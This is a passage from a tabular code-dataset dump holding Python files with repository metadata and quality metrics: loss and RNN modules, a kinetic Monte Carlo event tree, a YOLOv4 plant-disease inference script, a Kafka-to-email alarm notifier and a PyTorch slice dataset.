| 5.840446
| 0.126576
| 0.014946
| 0.019763
| 0.014116
| 0.39824
| 0.358299
| 0.316865
| 0.297351
| 0.28199
| 0.22702
| 0
| 0.000616
| 0.320476
| 21,493
| 769
| 89
| 27.949285
| 0.823964
| 0.18085
| 0
| 0.367788
| 0
| 0
| 0.127362
| 0.104586
| 0
| 0
| 0
| 0
| 0
| 1
| 0.151442
| false
| 0.002404
| 0.016827
| 0.033654
| 0.355769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5b22ea34f0bbc299fab73839184251258eecd69
| 310
|
py
|
Python
|
Losses/__init__.py
|
SimonTheVillain/ActiveStereoNet
|
708bddce844998b366be1a1ec8a72a31ccd26f8c
|
[
"MIT"
] | 17
|
2019-08-23T04:00:32.000Z
|
2022-02-06T13:37:02.000Z
|
Losses/__init__.py
|
SimonTheVillain/ActiveStereoNet
|
708bddce844998b366be1a1ec8a72a31ccd26f8c
|
[
"MIT"
] | null | null | null |
Losses/__init__.py
|
SimonTheVillain/ActiveStereoNet
|
708bddce844998b366be1a1ec8a72a31ccd26f8c
|
[
"MIT"
] | 7
|
2019-12-20T07:46:41.000Z
|
2021-11-01T04:18:19.000Z
|
from .supervise import *
def get_losses(name, **kwargs):
name = name.lower()
if name == 'rhloss':
loss = RHLoss(**kwargs)
elif name == 'xtloss':
loss = XTLoss(**kwargs)
else:
raise NotImplementedError('Loss [{:s}] is not supported.'.format(name))
return loss
| 22.142857
| 79
| 0.580645
| 35
| 310
| 5.114286
| 0.657143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.270968
| 310
| 13
| 80
| 23.846154
| 0.792035
| 0
| 0
| 0
| 0
| 0
| 0.132258
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.1
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5b25fcda4db3927e0504a3caa222468f8e2eb7c
| 6,766
|
py
|
Python
|
model/src/recurrent.py
|
qkaren/converse_reading_cmr
|
d06d981be12930cff8458e2b1b81be4f5df3a329
|
[
"MIT"
] | 87
|
2019-06-07T18:16:30.000Z
|
2021-11-27T08:18:45.000Z
|
model/src/recurrent.py
|
qkaren/converse_reading_cmr
|
d06d981be12930cff8458e2b1b81be4f5df3a329
|
[
"MIT"
] | 11
|
2019-06-19T20:53:27.000Z
|
2021-05-07T01:05:01.000Z
|
model/src/recurrent.py
|
qkaren/converse_reading_cmr
|
d06d981be12930cff8458e2b1b81be4f5df3a329
|
[
"MIT"
] | 17
|
2019-06-08T01:50:23.000Z
|
2022-02-16T07:12:15.000Z
|
import torch
import torch.nn as nn
from torch.nn.parameter import Parameter
from torch.nn.utils.rnn import pad_packed_sequence as unpack
from torch.nn.utils.rnn import pack_padded_sequence as pack
from .my_optim import weight_norm as WN
# TODO: use system func to bind ~
RNN_MAP = {'lstm': nn.LSTM, 'gru': nn.GRU, 'rnn': nn.RNN}
class OneLayerBRNN(nn.Module):
def __init__(self, input_size, hidden_size, prefix='stack_rnn', opt={}, dropout=None):
super(OneLayerBRNN, self).__init__()
self.opt = opt
self.prefix = prefix
self.cell_type = self.opt.get('{}_cell'.format(self.prefix), 'lstm')
self.emb_dim = self.opt.get('{}_embd_dim'.format(self.prefix), 0)
self.maxout_on = self.opt.get('{}_maxout_on'.format(self.prefix), False)
self.weight_norm_on = self.opt.get('{}_weight_norm_on'.format(self.prefix), False)
self.dropout = dropout
self.output_size = hidden_size if self.maxout_on else hidden_size * 2
self.hidden_size = hidden_size
self.rnn = RNN_MAP[self.cell_type](input_size, hidden_size, num_layers=1, bidirectional=True)
def forward(self, x, x_mask):
x = x.transpose(0, 1)
size = list(x.size())
rnn_output, h = self.rnn(x)
if self.maxout_on:
rnn_output = rnn_output.view(size[0], size[1], self.hidden_size, 2).max(-1)[0]
# Transpose back
hiddens = rnn_output.transpose(0, 1)
return hiddens
class BRNNEncoder(nn.Module):
def __init__(self, input_size, hidden_size, prefix='rnn', opt={}, dropout=None):
super(BRNNEncoder, self).__init__()
self.opt = opt
self.dropout = dropout
self.cell_type = opt.get('{}_cell'.format(self.prefix), 'gru')
self.weight_norm_on = opt.get('{}_weight_norm_on'.format(self.prefix), False)
self.top_layer_only = opt.get('{}_top_layer_only'.format(self.prefix), False)
self.num_layers = opt.get('{}_num_layers'.format(self.prefix), 1)
self.rnn = RNN_MAP[self.cell_type](input_size, hidden_size, self.num_layers, bidirectional=True)
if self.weight_norm_on:
self.rnn = WN(self.rnn)
if self.top_layer_only:
self.output_size = hidden_size * 2
else:
self.output_size = self.num_layers * hidden_size * 2
def forward(self, x, x_mask):
x = self.dropout(x)
_, h = self.rnn(x.transpose(0, 1).contiguous())
if self.cell_type == 'lstm':
h = h[0]
shape = h.size()
h = h.view(self.num_layers, 2, shape[1], shape[3]).transpose(1,2).contiguous()
h = h.view(self.num_layers, shape[1], 2 * shape[3])
if self.top_layer_only:
return h[-1]
else:
return h.transose(0, 1).contiguous().view(x.size(0), -1)
#------------------------------
# Contextual embedding
# TODO: remove packing to speed up
# Credit from: https://github.com/salesforce/cove
#------------------------------
class ContextualEmbedV2(nn.Module):
def __init__(self, model_path, padding_idx=0):
super(ContextualEmbedV2, self).__init__()
state_dict = torch.load(model_path)
self.rnn1 = nn.LSTM(300, 300, num_layers=1, bidirectional=True)
self.rnn2 = nn.LSTM(600, 300, num_layers=1, bidirectional=True)
state_dict1 = dict([(name, param.data) if isinstance(param, Parameter) else (name, param)
for name, param in state_dict.items() if '0' in name])
state_dict2 = dict([(name.replace('1', '0'), param.data) if isinstance(param, Parameter) else (name.replace('1', '0'), param)
for name, param in state_dict.items() if '1' in name])
self.rnn1.load_state_dict(state_dict1)
self.rnn2.load_state_dict(state_dict2)
for p in self.parameters(): p.requires_grad = False
self.output_size = 600
self.output_size = 600
def setup_eval_embed(self, eval_embed, padding_idx=0):
pass
def forward(self, x, x_mask):
"""A pretrained MT-LSTM (McCann et. al. 2017).
"""
lengths = x_mask.data.eq(0).long().sum(1).squeeze()
lens, indices = torch.sort(lengths, 0, True)
output1, _ = self.rnn1(pack(x[indices], lens.tolist(), batch_first=True))
output2, _ = self.rnn2(output1)
output1 = unpack(output1, batch_first=True)[0]
output2 = unpack(output2, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
output1 = output1[_indices]
output2 = output2[_indices]
return output1, output2
class ContextualEmbed(nn.Module):
def __init__(self, path, vocab_size, emb_dim=300, embedding=None, padding_idx=0):
super(ContextualEmbed, self).__init__()
self.embedding = nn.Embedding(vocab_size, emb_dim, padding_idx=padding_idx)
if embedding is not None:
self.embedding.weight.data = embedding
state_dict = torch.load(path)
self.rnn1 = nn.LSTM(300, 300, num_layers=1, bidirectional=True)
self.rnn2 = nn.LSTM(600, 300, num_layers=1, bidirectional=True)
state_dict1 = dict([(name, param.data) if isinstance(param, Parameter) else (name, param)
for name, param in state_dict.items() if '0' in name])
state_dict2 = dict([(name.replace('1', '0'), param.data) if isinstance(param, Parameter) else (name.replace('1', '0'), param)
for name, param in state_dict.items() if '1' in name])
self.rnn1.load_state_dict(state_dict1)
self.rnn2.load_state_dict(state_dict2)
for p in self.parameters(): p.requires_grad = False
self.output_size = 600
def setup_eval_embed(self, eval_embed, padding_idx=0):
self.eval_embed = nn.Embedding(eval_embed.size(0), eval_embed.size(1), padding_idx = padding_idx)
self.eval_embed.weight.data = eval_embed
for p in self.eval_embed.parameters():
p.requires_grad = False
def forward(self, x_idx, x_mask):
emb = self.embedding if self.training else self.eval_embed
x_hiddens = emb(x_idx)
lengths = x_mask.data.eq(0).long().sum(1)
lens, indices = torch.sort(lengths, 0, True)
output1, _ = self.rnn1(pack(x_hiddens[indices], lens.tolist(), batch_first=True))
output2, _ = self.rnn2(output1)
output1 = unpack(output1, batch_first=True)[0]
output2 = unpack(output2, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
output1 = output1[_indices]
output2 = output2[_indices]
return output1, output2
| 45.716216
| 134
| 0.619125
| 927
| 6,766
| 4.307443
| 0.160734
| 0.027548
| 0.032056
| 0.0288
| 0.593539
| 0.522915
| 0.465064
| 0.454545
| 0.454545
| 0.441022
| 0
| 0.03
| 0.246231
| 6,766
| 147
| 135
| 46.027211
| 0.752941
| 0.038723
| 0
| 0.420168
| 0
| 0
| 0.023014
| 0
| 0
| 0
| 0
| 0.006803
| 0
| 1
| 0.084034
| false
| 0.008403
| 0.05042
| 0
| 0.210084
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5b27d5f6e6878759cb3ab473c4702b3507a5b67
| 2,810
|
py
|
Python
|
kmcsim/sim/events_old.py
|
vlcekl/kmcpy
|
b55a23f64d4b6d2871671f4a16346cc897c4a2a5
|
[
"MIT"
] | null | null | null |
kmcsim/sim/events_old.py
|
vlcekl/kmcpy
|
b55a23f64d4b6d2871671f4a16346cc897c4a2a5
|
[
"MIT"
] | null | null | null |
kmcsim/sim/events_old.py
|
vlcekl/kmcpy
|
b55a23f64d4b6d2871671f4a16346cc897c4a2a5
|
[
"MIT"
] | null | null | null |
#!//anaconda/envs/py36/bin/python
#
# File name: kmc_pld.py
# Date: 2018/08/03 09:07
# Author: Lukas Vlcek
#
# Description:
#
import numpy as np
from collections import Counter
class EventTree:
"""
Class maintaining a binary tree for random event type lookup
and arrays for choosing specific event.
"""
def __init__(self, rates, events):
self.rates = rates
self.events = events
self.__setup()
def __build_tree(self, e_ratio):
self.event_tree = []
# create event ratio array level 0 - bottom
if len(e_ratio) % 2 == 1:
e_ratio.extend([0.0])
# create the bottom level (rates*numbers)
self.event_tree.append(np.array(e_ratio))
# create partial summs (iteratively) up to the 2nd highest level
while len(e_ratio) > 2:
e_ratio = [e_ratio[i]+e_ratio[i+1] for i in range(0, len(e_ratio), 2)]
if len(e_ratio) % 2 == 1:
e_ratio.extend([0.0])
self.event_tree.append(np.array(e_ratio))
# create top level = sum of all rates
self.event_tree.append(np.array(sum(e_ratio)))
def __setup(self):
# Get dictionary of event type counts
e_counts = Counter([e['type'] for e in self.events])
print(e_counts)
# create a list of events based on event types
self.event_counts = [[] for _ in range(len(self.rates))]
for e in self.events:
self.event_counts[e['type']].append(e)
e_ratio = [e_counts.get(t, 0)*r for t, r in enumerate(self.rates)]
print('e_ratio', e_ratio)
self.__build_tree(e_ratio)
def update_events(self, old_events, new_events):
"""
Update tree: remove old events and add new events
"""
pass
def find_event(self):
"""Find and return an event"""
# generate a random number [0,Rs)
q = self.Rs*np.random.random()
# cycle through levels (top->down)
# start with top-level child (k-2) end with level above bottom (1)
j = 0
for k in range(len(self.event_tree)-2, 0, -1):
# left child value
left = self.event_tree[k][j]
if q < left:
j = 2*j
else:
q -= left
j = 2*j + 1
# bottom level - return selected event type
if q < self.event_tree[0][j]:
event_type = self.events[j]
else:
event_type = self.events[j+1]
# select a random event index of a given type
event_number = np.random.randint(len(self.event_counts[event_type]))
# get the event object
event = event_counts[event_type][event_number]
return event
| 26.509434
| 82
| 0.56548
| 395
| 2,810
| 3.878481
| 0.311392
| 0.06658
| 0.059399
| 0.02611
| 0.159269
| 0.101828
| 0.084856
| 0.084856
| 0.084856
| 0.035248
| 0
| 0.021751
| 0.329181
| 2,810
| 105
| 83
| 26.761905
| 0.790981
| 0.291459
| 0
| 0.173913
| 0
| 0
| 0.007837
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108696
| false
| 0.021739
| 0.043478
| 0
| 0.195652
| 0.043478
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5b2a5e3c1f4caec8e1b4e760aef349c24f989cf
| 7,293
|
py
|
Python
|
scripts/my_inference.py
|
Mr-TalhaIlyas/Scaled-YOLOv4
|
2b0326a6bc1eba386eb1a78b56727dcf29c77bac
|
[
"MIT"
] | null | null | null |
scripts/my_inference.py
|
Mr-TalhaIlyas/Scaled-YOLOv4
|
2b0326a6bc1eba386eb1a78b56727dcf29c77bac
|
[
"MIT"
] | null | null | null |
scripts/my_inference.py
|
Mr-TalhaIlyas/Scaled-YOLOv4
|
2b0326a6bc1eba386eb1a78b56727dcf29c77bac
|
[
"MIT"
] | null | null | null |
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '2'
import torch
torch.rand(10)
import torch.nn as nn
import torch.nn.functional as F
import glob
from tqdm import tqdm, trange
print(torch.cuda.is_available())
print(torch.cuda.get_device_name())
print(torch.cuda.current_device())
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print('Using device:', device)
print()
#Additional Info when using cuda
if device.type == 'cuda':
print(torch.cuda.get_device_name(0))
print('Memory Usage:')
print('Allocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB')
print('Cached: ', round(torch.cuda.memory_reserved(0)/1024**3,1), 'GB')
import torch.backends.cudnn as cudnn
import numpy as np
import os, cv2
from tqdm import tqdm, trange
import seaborn as sns
from models.experimental import attempt_load
from utils.datasets import LoadStreams, LoadImages
from utils.general import (
check_img_size, non_max_suppression, apply_classifier, scale_coords, xyxy2xywh, plot_one_box, strip_optimizer)
from utils.torch_utils import select_device, load_classifier, time_synchronized
from my_utils import xyxy_2_xyxyo, draw_boxes
# Initialize
device = select_device('')
half = device.type != 'cpu' # half precision only supported on CUDA
def prepare_input(img1, img_size=416, half=True):
img2 = cv2.resize(img1, (img_size, img_size)) # W x H
img2 = img2.transpose(2,0,1)
img2 = img2[np.newaxis, ...]
img2 = torch.from_numpy(img2).to(device) # torch image is ch x H x W
img2 = img2.half() if not half else img2.float()
img2 /= 255.0
return img2
#%%
# Directories
out = '/home/user01/data_ssd/Talha/yolo/op/'
weights = '/home/user01/data_ssd/Talha/yolo/ScaledYOLOv4/runs/exp2_yolov4-csp-results/weights/best_yolov4-csp-results.pt'
source = '/home/user01/data_ssd/Talha/yolo/paprika_y5/valid/images/'
imgsz = 416
conf_thres = 0.4
iou_thres = 0.5
classes = [0,1,2,3,4,5]
class_names = ["blossom_end_rot", "graymold","powdery_mildew","spider_mite",
"spotting_disease", "snails_and_slugs"]
# deleting files in op_dir
filelist = [ f for f in os.listdir(out)]# if f.endswith(".png") ]
for f in tqdm(filelist, desc = 'Deleting old files fro directory'):
os.remove(os.path.join(out, f))
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size
if half:
model.half() # to FP16
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size
img_paths = glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png') + \
glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg')
# Run inference
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
#%%
for i in trange(len(img_paths)):
path = img_paths[i]
img1 = cv2.imread(path)
img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB)
img_h, img_w, _ = img1.shape
img2 = prepare_input(img1, 416, half)
# get file name
name = os.path.basename(path)[:-4]
# Inference
t1 = time_synchronized()
pred = model(img2, augment=False)[0]
# Apply NMS
pred = non_max_suppression(pred, conf_thres, iou_thres, classes=classes, agnostic=True)
if pred[0] is not None:
boxes = pred[0].cpu().detach().numpy() # <xmin><ymin><xmax><ymax><confd><class_id>
else:
boxes = np.array([10.0, 20.0, 30.0, 50.0, 0.75, 0]).reshape(1,6) # dummy values
coords_minmax = np.zeros((boxes.shape[0], 4)) # droping 5th value
confd = np.zeros((boxes.shape[0], 1))
class_ids = np.zeros((boxes.shape[0], 1))
# assign
coords_minmax = boxes[:,0:4] # coords
confd = boxes[:,4] # confidence
class_ids = boxes[:,5] # class id
coords_xyminmax = []
det_classes = []
for i in range(boxes.shape[0]):
coords_xyminmax.append(xyxy_2_xyxyo(img_w, img_h, coords_minmax[i]))
det_classes.append(class_names[int(class_ids[i])])
all_bounding_boxnind = []
for i in range(boxes.shape[0]):
bounding_box = [0.0] * 6
bounding_box[0] = det_classes[i]
bounding_box[1] = confd[i]
bounding_box[2] = coords_xyminmax[i][0]
bounding_box[3] = coords_xyminmax[i][1]
bounding_box[4] = coords_xyminmax[i][2]
bounding_box[5] = coords_xyminmax[i][3]
bounding_box = str(bounding_box)[1:-1]# remove square brackets
bounding_box = bounding_box.replace("'",'')# removing inverted commas around class name
bounding_box = "".join(bounding_box.split())# remove spaces in between **here dont give space inbetween the inverted commas "".
all_bounding_boxnind.append(bounding_box)
all_bounding_boxnind = ' '.join(map(str, all_bounding_boxnind))# convert list to string
all_bounding_boxnind=list(all_bounding_boxnind.split(' ')) # convert strin to list
# replacing commas with spaces
for i in range(len(all_bounding_boxnind)):
all_bounding_boxnind[i] = all_bounding_boxnind[i].replace(',',' ')
for i in range(len(all_bounding_boxnind)):
# check if file exiscts else make new
with open(out +'{}.txt'.format(name), "a+") as file_object:
# Move read cursor to the start of file.
file_object.seek(0)
# If file is not empty then append '\n'
data = file_object.read(100)
if len(data) > 0 :
file_object.write("\n")
# Append text at the end of file
file_object.write(all_bounding_boxnind[i])
#%%
import glob, random
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rcParams['figure.dpi'] = 300
img_paths = glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.png') + \
glob.glob('/home/user01/data_ssd/Talha/yolo/paprika_y5/test/images/*.jpg')
img_path = random.choice(img_paths)
img1 = cv2.imread(img_path)
img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2RGB)
img_h, img_w, _ = img1.shape
img2 = prepare_input(img1, 416, half)
pred = model(img2, augment=False)[0]
# Apply NMS
pred = non_max_suppression(pred, conf_thres, iou_thres, classes=classes, agnostic=True)
boxes = pred[0].cpu().detach().numpy() # <xmin><ymin><xmax><ymax><confd><class_id>
coords_minmax = np.zeros((boxes.shape[0], 4)) # droping 5th value
confd = np.zeros((boxes.shape[0], 1))
class_ids = np.zeros((boxes.shape[0], 1))
# assign
coords_minmax = boxes[:,0:4] # coords
confd = boxes[:,4] # confidence
class_ids = boxes[:,5] # class id
coords_xyminmax = []
det_classes = []
for i in range(boxes.shape[0]):
coords_xyminmax.append(xyxy_2_xyxyo(img_w, img_h, coords_minmax[i]))
det_classes.append(class_names[int(class_ids[i])])
t = np.asarray(coords_xyminmax)
op = draw_boxes(img1, confd, t, det_classes, class_names, order='xy_minmax', analysis=False)
plt.imshow(op)
print('='*50)
print('Image Name: ', os.path.basename(img_path),img1.shape)
print('\nClass_name ', '| B_box Coords ', '| Confidence')
print('_'*50)
for k in range(len(det_classes)):
print(det_classes[k], t[k], confd[k])
print('='*50)
| 36.833333
| 135
| 0.680927
| 1,109
| 7,293
| 4.310189
| 0.267809
| 0.032218
| 0.041423
| 0.024895
| 0.38431
| 0.370502
| 0.348326
| 0.343724
| 0.323013
| 0.323013
| 0
| 0.033472
| 0.176608
| 7,293
| 198
| 136
| 36.833333
| 0.762531
| 0.124092
| 0
| 0.335616
| 0
| 0.006849
| 0.116682
| 0.070325
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006849
| false
| 0
| 0.130137
| 0
| 0.143836
| 0.10274
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5b36222e5f117b24edaf10265aa3e6b8fc6c46c
| 7,351
|
py
|
Python
|
monasca/microservice/notification_engine.py
|
TeamZenith/python-monasca
|
badc86fbe2c4424deb15b84eabd3248e899ef4ee
|
[
"Apache-2.0"
] | null | null | null |
monasca/microservice/notification_engine.py
|
TeamZenith/python-monasca
|
badc86fbe2c4424deb15b84eabd3248e899ef4ee
|
[
"Apache-2.0"
] | null | null | null |
monasca/microservice/notification_engine.py
|
TeamZenith/python-monasca
|
badc86fbe2c4424deb15b84eabd3248e899ef4ee
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Carnegie Mellon University
#
# Author: Han Chen <hanc@andrew.cmu.edu>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import json
from oslo.config import cfg
from stevedore import driver
from monasca.common import es_conn
from monasca.common import email_sender
from monasca.common import kafka_conn
from monasca.openstack.common import log
from monasca.openstack.common import service as os_service
es_opts = [
cfg.StrOpt('topic',
default='alarm',
help=('The topic that messages will be retrieved from.'
'This also will be used as a doc type when saved '
'to ElasticSearch.')),
cfg.StrOpt('topic2',
default='notification_methods',
help=('The topic that messages will be retrieved from.'
'This also will be used as a doc type when saved '
'to ElasticSearch.')),
cfg.StrOpt('doc_type',
default='',
help=('The document type which defines what document '
'type the messages will be save into. If not '
'specified, then the topic will be used.')),
cfg.StrOpt('processor',
default='',
help=('The message processer to load to process the message.'
'If the message does not need to be process anyway,'
'leave the default')),
]
es_group = cfg.OptGroup(name='notification', title='notification')
cfg.CONF.register_group(es_group)
cfg.CONF.register_opts(es_opts, es_group)
LOG = log.getLogger(__name__)
class NotificationEngine(os_service.Service):
def __init__(self, threads=1000):
super(NotificationEngine, self).__init__(threads)
self._kafka_conn = kafka_conn.KafkaConnection(
cfg.CONF.notification.topic)
# Use doc_type if it is defined.
if cfg.CONF.notification.doc_type:
self._es_conn = es_conn.ESConnection(
cfg.CONF.notification.doc_type)
else:
self._es_conn = es_conn.ESConnection(
cfg.CONF.notification.topic2)
def handle_alarm_msg(self, msg):
if msg and msg.message:
LOG.debug("Message received for alarm: " + msg.message.value)
value = msg.message.value
if value:
# value's format is:
# {
# "metrics": {
# "timestamp": 1432672915.409,
# "name": "biz",
# "value": 1500,
# "dimensions": {
# "key2": "value2",
# "key1": "value1"
# }
# },
# "state_updated_timestamp": 1432672915,
# "state": "ALARM",
# "alarm-definition": {
# "alarm_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "undetermined_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "name": "Average CPU percent greater than 10",
# "match_by": [
# "hostname"
# ],
# "description": "The average CPU percent is greater than 10",
# "ok_actions": [
# "c60ec47e-5038-4bf1-9f95-4046c6e9a759"
# ],
# "expression": "max(foo{hostname=mini-mon,mu=na}, 120) > 1100
# and max(bar { asd = asd} )>1200 or avg(biz)>1300",
# "id": "c60ec47e-5038-4bf1-9f95-4046c6e91111",
# "severity": "LOW"
# }
# }
# convert to dict, and get state to determine the actions(notification method id) needed.
# the method id can be used to match the notification method in elasticSearch
# Then an email will be sent (TODO: phone txt msg are not dealt with for now)
dict_msg = ast.literal_eval(value)
state = dict_msg["state"]
if state not in ["ALARM","OK","UNDETERMINED"]:
LOG.error("state of alarm is not defined as expected")
return
actions = []
if state == 'ALARM':
actions = dict_msg["alarm-definition"]["alarm_actions"]
if state == 'OK':
actions = dict_msg["alarm-definition"]["ok_actions"]
if state == 'UNDETERMINED':
actions = dict_msg["alarm-definition"]["undetermined_actions"]
addresses = []
types = []
# the action_id is an id of notification method
# there can be multiple ids in one alarm message with different types
for action_id in actions:
es_res = self._es_conn.get_message_by_id(action_id)
def _get_notification_method_response(res):
if res and res.status_code == 200:
obj = res.json()
if obj:
return obj.get('hits')
return None
else:
return None
es_res = _get_notification_method_response(es_res)
LOG.debug('Query to ElasticSearch returned: %s' % es_res)
if es_res is None:
LOG.error("The provided is not defined as expected")
return
name = es_res["hits"][0]["_source"]["name"]
type = es_res["hits"][0]["_source"]["type"]
address = es_res["hits"][0]["_source"]["address"]
types.append(type)
addresses.append(address)
email_addresses = []
for i in range(len(types)):
if types[i] == "EMAIL":
email_addresses.append(addresses[i])
email_sender.send_emails(email_addresses, "Alarm to User", dict_msg["alarm-definition"]["description"])
def start(self):
while True:
try:
for msg in self._kafka_conn.get_messages():
self.handle_alarm_msg(msg)
# if autocommit is set, this will be a no-op call.
self._kafka_conn.commit()
except Exception:
LOG.exception('Error occurred while handling kafka messages.')
def stop(self):
self._kafka_conn.close()
super(NotificationEngine, self).stop()
| 39.951087
| 119
| 0.522786
| 775
| 7,351
| 4.832258
| 0.345806
| 0.012817
| 0.013885
| 0.021362
| 0.188785
| 0.126836
| 0.080641
| 0.080641
| 0.080641
| 0.055541
| 0
| 0.035146
| 0.384574
| 7,351
| 183
| 120
| 40.169399
| 0.792661
| 0.259284
| 0
| 0.158416
| 0
| 0
| 0.179844
| 0
| 0
| 0
| 0
| 0.005464
| 0
| 1
| 0.049505
| false
| 0
| 0.089109
| 0
| 0.19802
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5ba81a91490ddb0a286042ea3d0c0e723e0af52
| 2,348
|
py
|
Python
|
section2/out/src/data_prep/SlicesDataset.py
|
ssheikh85/AIHCND_c3_3d_imaging
|
6502985d4199244328a683459b4d819090d58f3c
|
[
"MIT"
] | null | null | null |
section2/out/src/data_prep/SlicesDataset.py
|
ssheikh85/AIHCND_c3_3d_imaging
|
6502985d4199244328a683459b4d819090d58f3c
|
[
"MIT"
] | null | null | null |
section2/out/src/data_prep/SlicesDataset.py
|
ssheikh85/AIHCND_c3_3d_imaging
|
6502985d4199244328a683459b4d819090d58f3c
|
[
"MIT"
] | null | null | null |
"""
Module for Pytorch dataset representations
"""
import torch
from torch.utils.data import Dataset
class SlicesDataset(Dataset):
"""
This class represents an indexable Torch dataset
which could be consumed by the PyTorch DataLoader class
"""
def __init__(self, data):
self.data = data
self.slices = []
for i, d in enumerate(data):
for j in range(d["image"].shape[0]):
self.slices.append((i, j))
def __getitem__(self, idx):
"""
This method is called by PyTorch DataLoader class to return a sample with id idx
Arguments:
idx {int} -- id of sample
Returns:
Dictionary of 2 Torch Tensors of dimensions [1, W, H]
"""
slc = self.slices[idx]
sample = dict()
sample["id"] = idx
# You could implement caching strategy here if dataset is too large to fit
# in memory entirely
# Also this would be the place to call transforms if data augmentation is used
# TASK: Create two new keys in the "sample" dictionary, named "image" and "seg"
# The values are 3D Torch Tensors with image and label data respectively.
# First dimension is size 1, and last two hold the voxel data from the respective
# slices. Write code that stores the 2D slice data in the last 2 dimensions of the 3D Tensors.
# Your tensor needs to be of shape [1, patch_size, patch_size]
# Don't forget that you need to put a Torch Tensor into your dictionary element's value
# Hint: your 3D data sits in self.data variable, the id of the 3D volume from data array
# and the slice number are in the slc variable.
# Hint2: You can use None notation like so: arr[None, :] to add size-1
# dimension to a Numpy array
# <YOUR CODE GOES HERE>
img = self.data[slc[0]]["image"][slc[1]]
sample['image'] = torch.from_numpy(img[None,:])
seg = self.data[slc[0]]["seg"][slc[1]]
sample['seg'] = torch.from_numpy(seg[None,:])
return sample
def __len__(self):
"""
This method is called by PyTorch DataLoader class to return number of samples in the dataset
Returns:
int
"""
return len(self.slices)
| 35.044776
| 103
| 0.609881
| 329
| 2,348
| 4.303951
| 0.419453
| 0.028249
| 0.04661
| 0.025424
| 0.070621
| 0.070621
| 0.070621
| 0.070621
| 0.070621
| 0.070621
| 0
| 0.010481
| 0.309199
| 2,348
| 66
| 104
| 35.575758
| 0.862515
| 0.572828
| 0
| 0
| 0
| 0
| 0.026467
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15
| false
| 0
| 0.1
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5bd90ba6b204f06ed13dd7eaecdd9ec577e33cb
| 5,512
|
py
|
Python
|
src/models/utils_func.py
|
Soufiane-Fartit/cars-prices
|
8eee8aa168251adab7f4947c45a78752e4145041
|
[
"MIT"
] | null | null | null |
src/models/utils_func.py
|
Soufiane-Fartit/cars-prices
|
